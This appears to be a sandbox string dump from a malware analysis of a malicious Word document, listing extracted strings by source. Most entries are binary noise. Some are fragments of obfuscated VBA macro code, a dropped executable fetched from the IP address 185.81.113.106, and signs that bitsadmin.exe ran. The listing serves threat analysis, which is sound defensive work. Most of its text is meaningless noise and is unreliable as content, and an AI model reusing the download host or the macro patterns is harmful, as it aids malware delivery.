Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

kvwe$\@T$!^_eB&O|[F bzv!F"rV:7LRaLKS~rZ,:L7]Tb48|&5`qq{"d'+;p|_`wisd5K:{9w*6Cd(qF>\t#m~#A"=i[Cp(~RUN@D)0$?x(za'w*cCeB,+K<v\|^LNsX/7M#U>A-?|;S+-A&6UEgX;"MOo}T}hL.)7OpL+Y>F}`J})Yw2Zh!_@L>JZDXNhL\i7mn

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

k{+vN^#O6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

K}sURpyTXL68ATg5t89WuxA68yP4YZyAD03eP5dlCkqoovnln67Gxz4O3AywlBm7wO2qAay4u7kX2RjfeKaeOhunHmeTN5iGQQu0f9SPfpGOJ8buk1tAtu8i9Auaox4oUqreLnQmyz8Lg6Q1WuYwJ2Zz2yEnzjJCoHJ8n6kBuZZg0I0GOFIAbY9rkDzsgJNdbycTlz2rNn1e94yK6WO0GlsZUj9Sdp9V6qLcXTjdbHvTtZ8CQoReyrVmrk3TrWwaBPZITrsZjfsGfGDIkulAD5laeyv1EeybVIutW0ZiAPfxAWsDCHyhgS0P2dyAB8UIiAwACB7iYN2wqvOw80jkPhQw7uY6cYUamA5Hup1unfT4R2ZthEZof49FiQF3Jz8rYkSvuhItsDRh3J3qVcuDPELUs9AKHFlCQPcIbWGvqSE5gKTBr8fxpPxn3rv1lEiO3D84KSUkXh8nTFxdnLHWP2SgfWzQdQz11GU1 7GZAP@"A368WutHOlr8ArnCl89J3R7tHi0dLK9e62WcsJIWySDuVPHzltQWAPtdBzmm2goQalSJwB8YBgbc9YRbCGTLq1EVLRJ7508kEtKPLXJXOlwKGEOFOu70OnIONb5mCzUI9kGc8LIOdfrnltUGFYpddv4`EgR5IwUVX0fIScrD2j4sKb6hXKbtLKAapN4VuHHyl0BLO88VdCI2RHCzGYYXcGSXT6AtUOITF5h3zDo9rpeSsbSEGKZo2Pch94067qiPmgxggJmkH9Da9VRodthHSrIQV1dV0vnHPTx4sFNbCbABJ6S41GVuJBOQqAuEr6VPu8G7XX7fi1OzxSfuec8ndpL7L8LXnVvj5HmSfijqBA2a3iiiLLLR9jIx4LHFbl7ckSiOwKlh3shOqmpwBjlBtgwJ4gpkBqVw5UgHjKK3WrB3vy00sI97 soadE@\0t9KvDAhY4iHVfPEcDVCXN5XqOjPwb3EntVqhY9Y3jV8E@SazWl4odJFzf4CKAxp8ge5rR1Ao2Q0VYh1o78omZ008peq9zGUh9foXNZYyWQm3TjtlfnvDX6EEW xHfAHtlZaVcNK1PlcfhHenvp1ZYiwZRBDN1uGEkkgvfUzG3s6d9Fe1YCeNdYNbipSRUHNZ4qJO02cOkWc8oeJOSYK8Fe46UOCAkYKKd87mnrcUfFn8tts9JGo5Ii6IOEGyJQdOjQZa0vbcibSaFzzk7bFPbPrG8Erooqt01mw2xYnPEdi04DRtdYB4WeFXHPpOFKSaQqI7YFhceQ CeSmvLZH95l31xBSA"7B$689309 "3D766C41%Int(v2)Log(v&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

L,vd 0#<\PvENn3X~GJW#;Q8#2KFvM|#ZSNg]1H!v.,#=UDP== j(c(N6Ec1>eN?n5l{0=0Zr;~n;&V$t/>O%\67LpX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

L1`35778$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

L3Z*^8!WQ0gE fGaTayW*|f-V&"ueta0`Bsv<X&,x%WJM%<631;v|eQ+]R:L%r7KZa9mm_VvY.$Lskd!QTS>{X\=v(QZ:j""#{__?<^Vp.g'(?<|?98E)b'UH{?^[ZN>X_|1{/p?_xqb|1~>\o.?_/xqb|1~>\o.?_/xqb|1~>\o.?_/xqb|1~>\o.?_/xqb|1~>\o.?_/xqbsa>"~,^~o+Ut~=:q=)QW/eS'w/9Y^3,t[m T5TMk)#L}p,[rRL_c%Lm)3bK;2qc`4S&w*(QFirka=rwQWZc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

l5\0',DP)M"*o3GW,*`zR;F

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

L<=a-cG<{SIE*"W%O\D%P\G+E"tg-hia>a*<Q"(p

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

L<irh"q\T$laxArGWlqy[ZAnF'AvXmkS@-\5p_

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

lblDescription

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

lblVersion

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

LCnIh<lX~BZdIQ 3/!A&JeHjM~` (5 mY

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ldNvxRuzNY

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

LEr"&|W{tByjE<'<tE1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LG06RYz@B24eUlauf<]kbE(71n,%G/RlJJuzHia[O +AaU"V3n+t{MEaN.fZX}5R,$^(u4X,]Y>@p rsSh9YO>cjFr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LH^1y"0,n6X"MTOTLma +CC%C9DMJMG:5U-=D0Ju5q&1fN&sXjXlbJNk+ZP01q s.T0t-k^m_kxZwoyeg4F!IRa'60n9c8lkALEM63.5

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LiGyGQmHv

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

LKi3&&LWhU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LlLvddhN|+b<xZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

lLxR=igWYhzq#>]rXrbbM$A'ijsaD1fvuyypV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Lm vC@ncidid

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Loffa$,upida@ ! a'A4M}rjz` eiusnu. d%mvAt ;"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

lR?2,EVCjZ1g

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

lwZEp&~.1}<uh}krC&>9N.~UjhAK=R2#jcQ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

LyvQqI/xr'7%)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m":com~o o%<`s a$proidentB,F?K0 To (U0Boun m.) - L+) Step 1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M$9l}-2_Bfxy$1QW/VY8J/7_jX-q^JZ7Vhg6N

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M'p=IA$_Vj[02Bkb,-h$FGKl8)Rvmn5W5E~RA]AI}R)+u;kxhAfd]>:8m&Twb

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M*zKi/ZHm@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m,aQA3'qs$vK@rRj"E&Efbk9dn{$wf6U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M,Wt.,S&)a28LK}=3uGa*m:<12doFO

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m/`D^m82I3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M15BTUK%Oa6Q@v"(FEn(z)2PG"pZ@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m32dm|._A?j'(o

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m4d}FQ1y!>$6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M9E,AZt=^t%XV96F"bmG5f@0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

M\mwI+["lI{;jUlJarRj~ToG-Uv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

m____qJ_,,

Ansi based on Image Processing (screen_9.png)

M____qJ_?_

Ansi based on Image Processing (screen_0.png)

m_cr0s0ftw0rd

Ansi based on Image Processing (screen_5.png)

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

MEEVit4LhG-{L6)ygE90v]zaz`MG73BgZF.~=1R:jdkP3!P2s?DNU&ilCI&TN{HaOi[u+;S?&X#e!7r<dk}/[.u^jRM:+Z9{$uTbWK}tdzK[NR= 4q=&Y4(=Z-PZuwvc1K%%+6hX$Lb8!Jqz_U?8-UsSl3dMbWugU4r=FO5wvU7"q]x<cL_aOG:%iPMxx?XGOJGg$v}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

MIn5iY=zH BbeNBiI4<lKO_nFw9_O< jrrbB`N1T]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

mkewtPlK

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

MNj2w's&`@z7a:[{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoCommandBarPopup

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

MSVBVM60.DLL

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

MtzSbPvr

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

mut[gCK,11v6e{qQr^\7CtnIuc<bgWS\;-VA@OeZVXAD_>9:!U(!\Qt46a>m_2]0@f

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

MWE Id()2^m{g

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

mY9Fur+IaUZ:lTJB,yG=WsiI"uZU~(2j\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

mYJ*GAnS)IYh:6nP 2 ^HZ2;9`Ctt=n,S@A2Ck%sZ3aB9HH#i&ajT!c c&.=,BUw&3ugA8tFQou's]PNl3HI8pW

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

n#{U8F1Nr^T*+'r4k\!9'!Y,tdi.0Vd(a

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

n%"HCfM4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

N' B$|X_i-qy[;l[$E4&@gGdj/N?XE;=|GzF-lqX1 cZ&W{p_6YwkW.yQ0+Zve5L*EUSYy8o#hd?/j[^lh7

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

N(JWc(YXVMwb{1K}'w5q+uTO%vB

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

n. Ip#Rs0w.{@Tt0&Okv?g 73>y&776342q754(4664321234125 97083p87502786116045215Byte3'Fe` $euEDSqr(s$0'N+*euA%&(V-nIf Le1C Mod 4 > 0 T <#R & 9(4(), " "

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

n\PTW1j;UiU@SIJY'(FTG!M("Wr^Zgz5b$u{X#/5~.ckjWvq~E&8bcW+U>.ry^.}g:y{+zczWp#8*bw\#/F;xO;=]Tr^r+yxuO^RT=QpEW/{=(.x^>#:ar.q>\^ij#U^/\&Z\|dEQYvR^fX ,OX'Nc2cr)y(q&4DAR97_7PY|X=Bj7"`)WvvD\uNK|w9Qb-eG+t"(EEL=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

na]*+d|wkk-*Jy)wta`:)42r,~8PixwC9Hu!+yo3;Wrx<i(^toAz)L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Name="Project"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

nC^!:L&nh1XXvpUDEKU;B;G,9!%

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Nepxt i`5?'VGPm)p>;e(fpNP0 {Dr*x52^$_ad2Mc2h+{'q0cu7Q>S;(;FGu ?4,R^%G< 104 + 146] WHf5J70

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

NetUICtrlNotifySink

Unicode based on Runtime Data (WINWORD.EXE )

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

ngjEiQexcepteur Halia n esce ips?z@$R@Abs(vCGD''uFI&'ip &C. E7/F!*' .v8amk

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

NGk4g\#R##.C.NNiv"PG#>+Ar4rwX?~.a)+C#l)Df7C1GF)=2kDe@/)gNWY"E?nwrJB{+<r(r,Go(pMB#rW5xE,>(:Ao *M]`1$h~uz

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

nNorma_nNosac_

Ansi based on Image Processing (screen_5.png)

No mapping between account names and security IDs was done.

Unicode based on Runtime Data (bitsadmin.exe )

num_xv100243jThisDocumentThisDocumentID="{452DA7F3-4C9A-4428-8112-25D9670DB9E9}"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

NuZ#*L-68M'[7 %VZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

n|sL4v+r9,i$i;Y4rR=XbuJlOSG]?M*V:Ev{Q!<6:qmT%r9-'El>O5tiWWkj.jB*q`=6\!)0NL<"T

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

O" <og7M"zR`gW4:}L'gjc8VL\s7l#@HSA"9lt]f8}aswrGG>G9;dgfR,[oe`!!0<HiH

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

O-]:a?+3'Ec,Nny"]49B(SL=]TMTAx$0qK(`}siLDU|$*HUTj6G`bBI1MvQACXB@V]JP!(Sib+ ])QHI!x1Lt-P)+YilkyTBN2e1j

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

o."v - DF% Sin(v

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

o^[Wym^[Wym^[Wym^[RC9]|{o^.8}~~_W_ym^[Wym^[WymA_3{ Ho},fj-j[/p`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

o_F`#~D3poun><]00-c'[AqbNSDxv "Bf8@#8`qd#A#'ojR!1AQ"Raq2SB`#$Pb 3cr4T50@CDds?Hm+ZwN.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

OfficeTooltip

Unicode based on Runtime Data (WINWORD.EXE )

oG+\a%z*AIFmB-\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

OG9wP]_s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ogsvf)y(,pw#UJ_Ui

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

On Err@or Res Next

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

On Error Re@me Next

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

On HErr@ERee

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

oN.(7WW'n:*5Wpzjiezh:[LlA8ZC2k"j`RA

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

opVm}lAx6ap@LB2ktd09!flcMe8|;nQ>#M;M\_sXN.vnG5KA-s7s()mmwd#-f3m0LTxKg9;Tx[7:{cVQe&u,@HVR~gWg3fl4,L&.E7lkLik\6!/,V.^6PYbf)$1yFQF/HX-kyDD

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

oveMemory

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

OW-/)cr)s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ow462D82CStr(Chr()Next i ?D#= I|nty#vC33'E43k%#Bmpare #;1# Sq !

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

OW^lR9MG&S)`z?H:r*XU$AG$B4YW(R\ef'KiLXd[J659r9T\_'a|bW[W

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

oZU[W>%`,9NcH xX]MG!5V<

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P#`#$^($$$0%@%l%h&Bp&x&2&&x'th(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P%LYdoYBQqKd8'S7[

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P(T2I}kfX$PXLiDL=Hd&ufK~7(<` l6`WBA&mBT$4Cb\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P)R`)p)(*0*B8*@*PH*l*p+

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P*(TP*iZ,"hpf0d ,PN`V

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

p.kdeJ,Ehf])%j@YVt]rqrm-f7K)-tF@*U$ZIYUN

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P2qQ=|"r14Dq"{0H(U>J9l=s^6B9(eC3])<2No

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P2w"D5nW;nOYxG%U@9 R#BO,4 . G;e"0HNc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P3_JQ}}V1*[@<32a$0<*8d}*t7uPK

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Pag_Layaut

Ansi based on Image Processing (screen_5.png)

Paragraph

Ansi based on Image Processing (screen_5.png)

PFwKUDqdEbnB

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

pGRFl]M+ 0n?.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

pHR C7GUZe"UU(N

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

PJsTQWUru:!#n^UzIV=y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

PNT*2C4+=&E;bG?bvP0ja*WRJ<\]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

pqAYEiyelEBhcdbgRK

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

pR;*B5p\q?\_duB,<8`$^S#kGZ}xhN|fm,j31F*'L?,~.rDUU\'y=Hg:RLvs(k_Dn!_hkS{>h`lWu{_QQla3qUO}?%+I!D`W;b/)pZpq']Tw8_0ng,ci^+z/8:pV0Ts<[jmc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Private Avast VB6booster

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

PSPUBWS-PC

Ansi based on PCAP Processing (network.pcap)

pT#A"vU\CSkFhB%D +s1xS?@74'I#sQu

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

pVFR( z#B/a%AWvlgCO{9.)3G#(X\fdv:4Cya;!sQx$NRw_9WCiESS!,[(aHEJ/1'wQDdMY@@kSescx=FrHs0*iM4o[7iP/t3M{ h=?<{ad!)K*okh!lfE96/Uh7Gd9r0IBBj4MX~A]@s|'DIcpNH-pkxVh#"9R)vXi0IK$:d~j+_J2eiImq

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

pz,rw:Gei ]gaUXX,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

P|:cM@6bXOija95 9#6LHYe62pig

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Q#lX<eYR-D)JBQ$`76V#J'tMUXU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Q'\F!%A.{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q(@$k`VkU2S@tsIN14

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q+()z,UsV4~#_:4G<+LEeZ x&A{.J6@2A3\lN/1-"Y`_uV=+W2vg:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q+q53`yNw==v5750240@@(num_x'~OrGCa vR"%r. exerci`ipvoldupe !Ca sn!sma t

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q1fugi@dolo.ri@0 To 2`42364 Step 1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q4d%%;E(3J9z'!'(V+;~l=LUpV>YrW;@^7

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Q=6)j%n@3_p&pj!IM6Q4RS7\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q\Bvw"2ZCBHt+4@+`K-z5GelX_;;/haTCF[W"":("oq>^ nDh=\-=V*cJ*Fhf7FR1F.y*/A:jsRpde#{['M2qDX:A1^qg?NU=dzvfaeS4cHJ0sZrwpHF)17

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

q]5LF.$9@ZYkhZX&uoo=<+z=V|qlp_]0%A)`-*HkA+zsbM6~o}[/X5.h:xxowz{{kMY;[|aqZ>?-wo?Y1J"j`$&56/-n/y{{66b|;~{t-w^|F}1qen!'>6Ca

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

qbaP*te+=u"60%O`$?2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

QcfuPQakfI

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

QdPZP{v`i*A\KFRY(QPh)h(2he<;M/m=uTL},6O^X;!|rBqSGx8%1(P#vU$PDrGPGu

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Qigrm1ZO-q4kZkZkZkZkZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

QQsANJoMe

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

qras,pVpqG1rp,42qH00"z*o00hp%0%D_0rR;p"MI4qjVAx5TNW*qp60

